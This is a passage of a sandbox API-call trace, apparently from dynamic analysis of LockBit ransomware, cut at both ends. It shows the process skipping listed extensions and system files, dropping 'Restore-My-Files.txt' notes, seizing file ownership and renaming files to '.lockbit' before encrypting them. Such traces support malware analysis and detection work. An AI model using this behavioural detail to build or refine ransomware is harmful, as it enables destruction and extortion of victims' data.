lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 0x0 [0096.298] GetLastError () returned 0x3e5 [0096.298] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink") returned 1 [0096.298] wsprintfW (in: param_1=0x344cb78, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt") returned 72 [0096.298] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0096.298] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c49d71, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c49d71, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9d2, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="ipsdan.xml", cAlternateFileName="")) returned 1 [0096.298] lstrcmpiW (lpString1=".", lpString2="ipsdan.xml") returned -1 [0096.298] lstrcmpiW (lpString1="..", lpString2="ipsdan.xml") returned -1 [0096.299] PathFindExtensionW (pszPath="ipsdan.xml") returned=".xml" [0096.299] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0096.299] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0096.299] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0096.299] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0096.299] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0096.299] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0096.299] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0096.299] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0096.299] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0096.299] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0096.299] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0096.299] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0096.299] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0096.299] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0096.299] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0096.299] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0096.299] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0096.299] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0096.299] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0096.299] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0096.299] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0096.299] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0096.299] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0096.299] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0096.299] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0096.299] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0096.300] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0096.300] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0096.300] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0096.300] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0096.300] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0096.300] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0096.300] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0096.300] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0096.300] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0096.300] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0096.300] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0096.300] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0096.300] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0096.300] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0096.300] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0096.300] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0096.300] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0096.300] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0096.300] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0096.300] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0096.300] wsprintfW (in: param_1=0x344d620, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0096.300] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ipsdan.xml") returned 1 [0096.300] lstrcmpiW (lpString1="ntldr", lpString2="ipsdan.xml") returned 1 [0096.300] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ipsdan.xml") returned 1 [0096.300] lstrcmpiW (lpString1="bootsect.bak", lpString2="ipsdan.xml") returned -1 [0096.300] lstrcmpiW (lpString1="autorun.inf", lpString2="ipsdan.xml") returned -1 [0096.300] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\") returned="" [0096.301] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml") returned=".xml" [0096.301] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0096.301] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0096.301] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0096.301] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0096.301] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0096.301] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0096.301] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0096.301] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0096.301] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0096.301] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0096.301] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0096.301] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0096.301] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0096.301] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0096.301] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0096.301] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0096.302] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0096.302] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0096.302] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0096.302] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0096.302] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0096.302] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0096.302] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0096.302] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0096.302] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0096.302] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0096.302] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0096.302] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0096.302] wsprintfW (in: param_1=0x344cdc0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.lockbit") returned 70 [0096.302] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0096.302] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml.lockbit")) returned 0 [0096.302] GetLastError () returned 0x5 [0096.303] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0096.303] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0096.303] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0096.303] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0096.304] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0096.304] NtOpenFile (in: FileHandle=0x344cd68, DesiredAccess=0x80, ObjectAttributes=0x344cc18*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344cc10, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344cd68*=0x430, IoStatusBlock=0x344cc10*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0096.304] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0096.304] NtQueryInformationFile (in: FileHandle=0x430, IoStatusBlock=0x344cc30, FileInformation=0x344caf0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344cc30, FileInformation=0x344caf0) returned 0x0 [0096.310] NtClose (Handle=0x430) returned 0x0 [0096.311] RtlFreeAnsiString (AnsiString="\\") [0096.311] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344cda4 | out: TokenHandle=0x344cda4*=0x430) returned 1 [0096.311] malloc (_Size=0x200) returned 0x3981cc0 [0096.311] GetTokenInformation (in: TokenHandle=0x430, TokenInformationClass=0x1, TokenInformation=0x3981cc0, TokenInformationLength=0x200, ReturnLength=0x344cda0 | out: TokenInformation=0x3981cc0, ReturnLength=0x344cda0) returned 1 [0096.311] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344cd88, dwRevision=0x1 | out: pSecurityDescriptor=0x344cd88) returned 1 [0096.311] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344cd88, pOwner=0x3981cc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344cd88) returned 1 [0096.311] CloseHandle (hObject=0x430) returned 1 [0096.311] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344cd88) returned 1 [0096.312] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344cd88) returned 1 [0096.312] free (_Block=0x3981cc0) [0096.312] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0096.312] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml.lockbit")) returned 1 [0096.313] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x430 [0096.313] CreateIoCompletionPort (FileHandle=0x430, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0096.313] malloc (_Size=0x40068) returned 0x20acee8 [0096.329] GetFileSizeEx (in: hFile=0x430, lpFileSize=0x20acf00 | out: lpFileSize=0x20acf00*=2514) returned 1 [0096.329] ReadFile (in: hFile=0x430, lpBuffer=0x20acf1c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x20acee8 | out: lpBuffer=0x20acf1c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20acee8) returned 1 [0096.347] GetLastError () returned 0x3e5 [0096.347] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink") returned 1 [0096.347] wsprintfW (in: param_1=0x344cb78, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt") returned 72 [0096.348] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0096.348] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c49d71, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c49d71, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa38, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="ipsdeu.xml", cAlternateFileName="")) returned 1 [0096.348] lstrcmpiW (lpString1=".", lpString2="ipsdeu.xml") returned -1 [0096.348] lstrcmpiW (lpString1="..", lpString2="ipsdeu.xml") returned -1 [0096.348] PathFindExtensionW (pszPath="ipsdeu.xml") returned=".xml" [0096.348] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0096.348] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0096.348] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0096.348] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0096.348] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0096.348] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0096.348] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0096.348] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0096.348] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0096.348] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0096.348] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0096.348] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0096.348] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0096.348] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0096.348] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0096.349] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0096.349] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0096.349] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0096.349] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0096.349] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0096.349] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0096.349] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0096.349] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0096.349] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0096.349] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0096.349] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0096.349] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0096.349] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0096.349] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0096.349] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0096.349] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0096.349] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0096.349] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0096.349] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0096.349] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0096.349] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0096.349] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0096.349] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0096.350] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0096.350] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0096.350] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0096.350] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0096.350] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0096.350] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0096.350] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0096.350] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0096.350] wsprintfW (in: param_1=0x344d620, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0096.350] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ipsdeu.xml") returned 1 [0096.350] lstrcmpiW (lpString1="ntldr", lpString2="ipsdeu.xml") returned 1 [0096.350] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ipsdeu.xml") returned 1 [0096.350] lstrcmpiW (lpString1="bootsect.bak", lpString2="ipsdeu.xml") returned -1 [0096.350] lstrcmpiW (lpString1="autorun.inf", lpString2="ipsdeu.xml") returned -1 [0096.350] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\") returned="" [0096.350] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml") returned=".xml" [0096.350] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0096.350] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0096.350] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0096.350] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0096.350] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0096.350] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0096.350] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0096.351] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0096.351] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0096.351] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0096.351] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0096.351] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0096.351] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0096.351] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0096.351] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0096.351] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0096.351] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0096.351] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0096.351] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0096.351] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0096.351] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0096.351] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0096.351] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0096.351] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0096.351] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0096.351] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0096.351] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0096.351] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0096.351] wsprintfW (in: param_1=0x344cdc0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.lockbit") returned 70 [0096.352] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0096.352] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml.lockbit")) returned 0 [0096.352] GetLastError () returned 0x5 [0096.352] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0096.353] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0096.353] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0096.353] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0096.353] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0096.353] NtOpenFile (in: FileHandle=0x344cd68, DesiredAccess=0x80, ObjectAttributes=0x344cc18*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344cc10, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344cd68*=0x3c0, IoStatusBlock=0x344cc10*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0096.354] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0096.354] NtQueryInformationFile (in: FileHandle=0x3c0, IoStatusBlock=0x344cc30, FileInformation=0x344caf0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344cc30, FileInformation=0x344caf0) returned 0x0 [0096.869] NtClose (Handle=0x3c0) returned 0x0 [0096.869] RtlFreeAnsiString (AnsiString="\\") [0096.869] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344cda4 | out: TokenHandle=0x344cda4*=0x3c0) returned 1 [0096.870] malloc (_Size=0x200) returned 0x3981cc0 [0096.870] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x3981cc0, TokenInformationLength=0x200, ReturnLength=0x344cda0 | out: TokenInformation=0x3981cc0, ReturnLength=0x344cda0) returned 1 [0096.870] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344cd88, dwRevision=0x1 | out: pSecurityDescriptor=0x344cd88) returned 1 [0096.870] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344cd88, pOwner=0x3981cc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344cd88) returned 1 [0096.870] CloseHandle (hObject=0x3c0) returned 1 [0096.870] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344cd88) returned 1 [0096.870] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344cd88) returned 1 [0096.871] free (_Block=0x3981cc0) [0096.871] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0096.871] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml.lockbit")) returned 1 [0096.872] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0096.872] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0096.872] malloc (_Size=0x40068) returned 0x3940048 [0096.872] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x3940060 | out: lpFileSize=0x3940060*=2616) returned 1 [0096.872] ReadFile (in: hFile=0x3c0, lpBuffer=0x394007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 0x0 [0096.874] GetLastError () returned 0x3e5 [0096.874] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink") returned 1 [0096.875] wsprintfW (in: param_1=0x344cb78, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt") returned 72 [0096.875] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0096.875] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c6fece, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c6fece, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa12, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="ipsen.xml", cAlternateFileName="")) returned 1 [0096.875] lstrcmpiW (lpString1=".", lpString2="ipsen.xml") returned -1 [0096.875] lstrcmpiW (lpString1="..", lpString2="ipsen.xml") returned -1 [0096.875] PathFindExtensionW (pszPath="ipsen.xml") returned=".xml" [0096.875] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0096.875] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0096.875] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0096.875] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0096.875] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0096.876] lstrcmpiW (lpString1=".theme", 